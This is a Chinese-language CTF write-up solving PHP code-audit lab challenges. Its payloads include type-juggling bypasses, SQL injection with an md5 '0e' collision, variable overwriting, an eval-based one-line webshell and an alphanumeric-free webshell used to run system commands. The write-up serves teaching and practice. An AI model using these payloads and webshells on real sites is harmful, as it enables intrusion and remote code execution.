PHP代码审计之CTF系列(1)
采用github yaofeifly师傅的PHP练习。每个内容均采用docker。部署过程:进入对应的docker_env,使用
docker-compose build docker-compose up -d
进入对应docker进程,查看地址访问即可。
challenge 1
访问地址,发现源码
1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= <?php error_reporting(0); require __DIR__.'/lib.php'; echo base64_encode(hex2bin(strrev(bin2hex($flag)))), '<hr>'; highlight_file(__FILE__);
题目给出字符串:
1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY=
页面给定相关的加密代码,进行反解。
编写解密函数方法:
<?php $str = "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY="; echo hex2bin(strrev(bin2hex(base64_decode($str)))); ?>
即可得到
补充:
bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值。 strrev() 函数反转字符串。 hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。
challenge 2
题目内容:
<?php error_reporting(0); require __DIR__.'/lib.php'; if(isset($_GET['time'])){ if(!is_numeric($_GET['time'])){ echo 'The time must be number.'; }else if($_GET['time'] < 60 * 60 * 24 * 30 * 2){ echo 'This time is too short.'; }else if($_GET['time'] > 60 * 60 * 24 * 30 * 3){ echo 'This time is too long.'; }else{ sleep((int)$_GET['time']); echo $flag; } echo '<hr>'; } highlight_file(__FILE__);
可以看出,如果想要得到flag,需要大于5184000并且小于7776000,但是发现得到flag之前会执行输入时间的sleep,怕不是要等到猴年马月了。
所以思路选择弱比较。
<?php echo 6e6; echo "\n"; echo (int)'6e6'; ?>
得出结果:
补充:
1、当一个字符串被当作一个数值来取值,其结果和类型如下:如果该字符串没有包含’.’,’e’,’E’并且其数值值在整形的范围之内,该字符串被当作int来取值。其他所有情况下都被作为float来取值,该字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0。
2、在进行比较运算时,如果遇到了0e这类字符串,PHP会将它解析为科学计数法。(也就是说只靠最前面的进行判断)
3、在进行比较运算时,如果遇到了0x这类字符串,PHP会将它解析为十六进制。
challenge 3
题目内容:
访问后发现没有什么内容,查看一下源码。
发现存在challenge3.txt文件,尝试访问。
发现源码
<?php error_reporting(0); echo "<!--challenge3.txt-->"; require __DIR__.'/lib.php'; if(!$_GET['id']) { header('Location: challenge3.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'Hahahahahaha'; return ; } $data = @file_get_contents($a,'r'); if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) { echo $flag; } else { print "work harder!harder!harder!"; } ?>
stripos()
stripos()函数:查找字符串在另一字符串中第一次出现的位置(不区分大小写)
strpos() – 查找字符串在另一字符串中第一次出现的位置(区分大小写)
strrpos() – 查找字符串在另一字符串中最后一次出现的位置(区分大小写)
stripos()函数返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。字符串位置从 0 开始,不是从 1 开始。
file_get_contents()
file_get_contents()函数:把整个文件读入一个字符串中,加上@是屏蔽对应的错误
PHP中fopen,file_get_contents,curl函数的区别:
1、fopen/file_get_contents 每次请求都会重新做DNS查询,并不对 DNS信息进行缓存。但是CURL会自动对DNS信息进行缓存。对同一域名下的网页或者图片的请求只需要一次DNS查询。这大大减少了DNS查询的次数。所以CURL的性能比fopen /file_get_contents 好很多。
2、fopen /file_get_contents 在请求HTTP时,使用的是http_fopen_wrapper,不会keeplive。而curl却可以。这样在多次请求多个链接时,curl效率会好一些。
3、fopen / file_get_contents 函数会受到php.ini文件中allow_url_open选项配置的影响。如果该配置关闭了,则该函数也就失效了。而curl不受该配置的影响。
4、curl 可以模拟多种请求,例如:POST数据,表单提交等,用户可以按照自己的需求来定制请求。而fopen / file_get_contents只能使用get方式获取数据。
eregi()
eregi()函数:在一个字符串中搜索指定的模式的字符串,搜索不区分大小写。eregi()可以特别有用的检查有效字符串,如密码。
题目
观察完代码后发现为php弱类型绕过。
首先$data通过读取$a,进行POST传递。
当$a为php://input,$data可以通过php://input来接受post数据。
$id传一个字符进去,会被转化为0。
对于$b,要求长度大于5,其次满足eregi()函数的要求(也就是截取$b的第一个字符与’111’拼接,和’1114’进行对比)和首字符不为4。
可以设置$b为%00111111,这样,substr()会发生截断,在匹配时进行eregi(‘111′,’1114’)满足,同时%00不会对strlen()造成影响。
构造payload:
?id=a&a=php://input&b=%00111111 1112 is a nice lab!
challenge4
打开后发现源码
<?php error_reporting(0); show_source(__FILE__); $a = @$_REQUEST['hello']; eval("var_dump($a);");
发现可构造php一句话木马
构造paypoad:
?hello=);eval($_POST['A']);%2f%2f
当var_dump($a);后的结果为:
string(22) ");eval($_POST['A']);//"
与前面代码进行拼凑后为:
eval("string(21) ");eval($_POST['A']);//"");
使用菜刀连接
challenge5
打开页面,点击View the source code,查看登陆逻辑源码内容
<?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password can not be your name!</p>'; else if (sha1($_GET['name']) === sha1($_GET['password'])) die('Flag: '.$flag); else echo '<p>Invalid password.</p>'; } else{ echo '<p>Login first!</p>'; ?>
isset()
isset()函数:检测变量是否设置
题目
发现登陆逻辑要求,name和password不能相同,但之后的sha1判断又使用了===,所以不存在所类型比较的问题。
其中sha1不能处理数组,当传入name[]=1&password[]=2时,会造成sha1(Array)=sha1(Array),即NULL===NULL,从而获取flag。
测试:
<?php $name = $_GET['name']; var_dump(@sha1($name)); ?>
结果为NULL
构造payload:
?name[]=1&password[]=2
challenge6
访问地址
查看源码,发现source.txt
<html> <head> welcome to simplexue </head> <body> <form method=post action=challenge6.php> <input type=text name=user value="Username"> <input type=password name=pass value="Password"> <input type=submit> </form> </body> <a href="source.txt"> </html>
访问发现源码
<?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********", "*****", "********"); mysql_select_db("challenges") or die("Could not select database"); if ($conn->connect_error) { die("Connection failed: " . mysql_error($conn)); } $user = $_POST[user]; $pass = md5($_POST[pass]); $sql = "select pwd from interest where uname='$user'"; $query = mysql_query($sql); if (!$query) { printf("Error: %s\n", mysql_error($conn)); exit(); } $row = mysql_fetch_array($query, MYSQL_ASSOC); //echo $row["pwd"]; if (($row[pwd]) && (!strcasecmp($pass, $row[pwd]))) { echo "<p>Logged in! Key:************** </p>"; } else { echo("<p>Log in failure!</p>"); } } ?>
mysql_fetch_array()
mysql_fetch_array():从结果集中取得一行作为数字数组或关联数组
strcasecmp()
strcasecmp():比较两个字符串(不区分大小写)
题目
发现查询用户处的sql语句没有进行过滤,存在sql注入
构造payload:
user=' union select "0e830400451993494058024219903391"
构成的sql语句为:
select pwd from interest where uname=' ' union select "0e830400451993494058024219903391"
第一个查询结果为空,返回值为0e830400451993494058024219903391
所以$row[pw]=0e830400451993494058024219903391
而md5(QNKCDZO)正是0e830400451993494058024219903391
最后payload:
user=' union select "0e830400451993494058024219903391"#&pass=QNKCDZO
challenge 8
打开发现没有任何提示,扫描文件,发现challenge7.txt
发现源码
<?php include "flag.php"; $_403 = "Access Denied"; $_200 = "Welcome Admin"; if ($_SERVER["REQUEST_METHOD"] != "POST") die("BugsBunnyCTF is here :p..."); if ( !isset($_POST["flag"]) ) die($_403); foreach ($_GET as $key => $value) $$key = $$value; foreach ($_POST as $key => $value) $$key = $value; if ( $_POST["flag"] !== $flag ) die($_403); echo "This is your flag : ". $flag . "\n"; die($_200);
发现其中为变量覆盖漏洞。
$_SERVER[“REQUEST_METHOD”]
$_SERVER[“REQUEST_METHOD”]是指表单提交的方式为,GET或POST
foreach
foreach:循环结构,是遍历数组时常用的方法,foreach仅能够应用于数组和对象,如果尝试其他类型的变量或者末初始化的变量将发出错误信息。
两种语法:
//格式1 foreach (array_expression as $value){ statement }
//格式2 foreach (array_expression as $key => $value){ statement }
第一种格式遍历:
array_expression数组时,每次循环将数组的值赋给$value
第二种格式遍历:
不仅将数组赋给$value,还将键名赋给$key
比如:
<?php $array = [0, 1, 2]; foreach ($array as $val){ echo "值是:" . $val ; echo "<br/>"; //var_dump(current($array)); } foreach ($array as $key => $value) { echo "键名是:" . $key . "值是:" . $value; echo "<br/>"; } ?>
结果为:
值是:0 值是:1 值是:2 键名是:0值是:0 键名是:1值是:1 键名是:2值是:2
foreach在PHP5和PHP7中的区别:
在PHP 5中,当foreach开始循环执行时,每次数组内部的指针都会自动向后移动一个单元,但在PHP 7中则不是。
比如:
<?php $array = [0, 1, 2]; foreach ($array as $val){ var_dump(current($array)); } ?>
在PHP 5中输出结果为:
int(0) int(1) int(2)
但在PHP 7中输出结果为:
int(0) int(0) int(0)
在PHP 7中,按照值进行循环时,foreach是对数组的复制操作,在循环过程中对数组的修改不会影响循环行为,但在PHP 5中会有影响。
比如:
<?php $array = [0, 1, 2]; //$ref =& $array; // Necessary to trigger the old behavior foreach ($array as $val) { var_dump($val); unset($array[1]); } ?>
在PHP 7中输出结果为:
int(0) int(1) int(2)
在PHP 5中输出结果为:
int(0) int(2)
在PHP 7中按照引用循环的时候对数组的修改会影响循环,在PHP 5中则不会改变
比如:
<?php $array = [0]; foreach ($array as &$val) { var_dump($val); $array[1] = 1; $array[2] = 2; } ?>
在PHP 7中运行结果:
int(0) int(1) int(2)
在PHP 5中运行结果:
int(0)
die()
die()函数:输出一条信息,并退出当前脚本。
该函数为exit()函数的别名。
语法:die(status)
如果status是字符串,则该函数会在退出输出字符串。
如果status是整数,这个值就会被用作退出状态。退出状态的值在0~254之间。退出状态255由PHP保留,不会被使用,状态0用于成功的终止程序。
注意:如果PHP的版本号大于4.2.0,那么在stasus是整数的情况下,不会输出该数字。
变量覆盖漏洞:
其中经常导致的有:$$,extract()函数,parse_str()函数,import_request_variables()使用不当,开启了全局变量注册等。
-
全局变量覆盖:register_globals的意思是注册为全局变量,当其为On的时候,传递过的值会直接被全局变量所使用,而Off的时候,需要到特定的数组中得到。
-
$$导致的变量覆盖问题:使用foreach来遍历数组数组中的值,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。因此产生了变量覆盖漏洞。
-
extract()变量覆盖:函数从数组中将变量导入当前的符号表。该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号中创建对应的一个便变量。 在调用extract()时使用EXTR_SKIP保证已有变量不会被覆盖。 extract($_GET,EXTR_SKIP)
-
parse_str()变量覆盖:parse_str()函数把查询字符串解析到变量中,如果没有array参数,则由该函数设置的变量将覆盖已有的同名变量。parse_str()类似的函数还有mb_parse_str(),用法基本一直。
-
import_request_variables变量覆盖:import_request_variables函数可以在register_global=off时,把GET/POST/Cookie变量导入全局作用域中。
题目分析
明白原理后,观察程序
要求在POST语句中有flag,同时在第二个foreach中又把$flag直接覆盖,所以可以确定,通过echo语句输出的flag是被修改过的。
观察其他部分。
1、发现die($_200),结合第一个foreach的功能,可以在第二个foreach之前先将$_200的值覆盖为原flag的值。
构造payload:
?_200=flag POST: flag=1
2、发现die(_$403),同样把原flag的值覆盖到$_403上,然后构造$_POST[“flag”] != $flag,从而die($403)输出结果。
构造payload:
?_403=flag&POST=1 POST: flag=
challenge 8
打开之后,发现PHP逻辑源码
<?php ini_set("display_errors", "On"); error_reporting(E_ALL | E_STRICT); if(!isset($_GET['c'])){ show_source(__FILE__); die(); } function rand_string( $length ) { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; $size = strlen( $chars ); $str = ''; for( $i = 0; $i < $length; $i++) { $str .= $chars[ rand( 0, $size - 1 ) ]; } return $str; } $data = $_GET['c']; $black_list = array(' ', '!', '"', '#', '%', '&', '*', ',', '-', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '<', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '|', '~'); foreach ($black_list as $b) { if (stripos($data, $b) !== false){ die("WAF!"); } } $filename=rand_string(0x20).'.php'; $folder='uploads/'; $full_filename = $folder.$filename; if(file_put_contents($full_filename, '<?php '.$data)){ echo "<a href='".$full_filename."'>WebShell</a></br>"; echo "Enjoy your webshell~"; }else{ echo "Some thing wrong..."; } ?>
ini_set
PHP ini_set用来设置php.ini的值,在函数执行时生效,脚本结束后,设置失效。不需要打开php.ini文件就可以修改。
常见的设置:
@ini_set('memory_limit','64M'):设置一个脚本所能够申请到的最大内存字节数。@符号表示不输出错误 @ini_set('display_errors','1'):设置错误信息的类别 @ini_set('session.auto_start','0'):是否自动开session处理,设置为1时,程序不用session_start()来手动开启session也可使用session。设置为0时,如果没有手动开启session,就会报错 @ini_set('session.cache_expire',180):指定会话页面在客户端cache中的有限期(分钟)缺省值为180分钟,如果设置了session.cache_limiter=nocache时,此处设置无效。 @ini_set('session.use_cookies','1'):是否使用cookie在客户端保存会话ID。 @ini_set('session.use_trans_sid','0'):是否使用明码在URL中显示SID(会话ID),默认是禁止状态。
error_reporting()函数
error_reporting()函数规定报告哪个错误。该函数设置当前脚本的错误报告级别。该函数返回旧的错误报告级别。
规定不停的错误级别报告:
<?php // 关闭错误报告 error_reporting(0); // 报告 runtime 错误 error_reporting(E_ERROR | E_WARNING | E_PARSE); // 报告所有错误 error_reporting(E_ALL); // 等同 error_reporting(E_ALL); ini_set("error_reporting", E_ALL); // 报告 E_NOTICE 之外的所有错误 error_reporting(E_ALL & ~E_NOTICE); ?>
file_put_contents()函数
file_put_contents()函数把一个字符串写入文件中。该函数访问文件时,遵循一下规则:
1、如果设置了 FILE_USE_INCLUDE_PATH,那么将检查 *filename* 副本的内置路径 2、如果文件不存在,将创建一个文件 3、打开文件 4、如果设置了 LOCK_EX,那么将锁定文件 5、如果设置了 FILE_APPEND,那么将移至文件末尾。否则,将会清除文件的内容 6、向文件中写入数据 7、关闭文件并对所有文件解锁
如果成功,该函数将返回写入文件中的字符数。如果失败,则返回 False。
题目
分析逻辑源码,发现总体代码可以分成两大部分。
第一部分对生成的文件进行命名处理,第二部分则是对内容的过滤,也就是WAF。
观察过滤内容,发现过滤了大部分字符、数字、字母。
所以这个地方应该使用PHP中异或的用法,查看了p师傅等几个师傅的文章。
简单来说就是通过对两个字符串转化为ASCII值,再将ASCII值转换成二进制,然后在进行异或,异或完将结果再次从二进制转化为ASCII值,最后转化成字符串
比如:
<?php echo "A"^"?"; ?> 运行结果:~
<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P $__.=("/"^"`"); // _PO $__.=("|"^"/"); // _POS $__.=("{"^"/"); // _POST ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); ?>
构造payload:
<?php $_=[].[]; $__=''; $_=$_['']; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $__.=$_; // E $_=++$_; $_=++$_; $__=$_.$__; // GE $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $_=++$_; $__.=$_; // GET var_dump(${'_'.$__}[_](${'_'.$__}[__])); // $_GET['_']($_GET['__']);
定义两个空数组,取产生的字符串’ArrayArray’,然后依次从A开始取,使参数$_进行自加,也就是’A’+’A’=’B’。拼凑GET,最后使用同样方法构造。
最后对其进行url编码
完整payload:
?c=%24_%3d%5b%5d.%5b%5d%3b%24__%3d%27%27%3b%24_%3d%24_%5b%27%27%5d%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__%3d%24_.%24__%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24%7b%27_%27.%24__%7d%5b_%5d(%24%7b%27_%27.%24__%7d%5b__%5d)%3b
使用刚刚定义的参数_和__进行命令执行
?_=system&__=cat%20../flag.php
来源:freebuf.com 2020-02-26 13:30:35 by: DeceaseWolf
请登录后发表评论
注册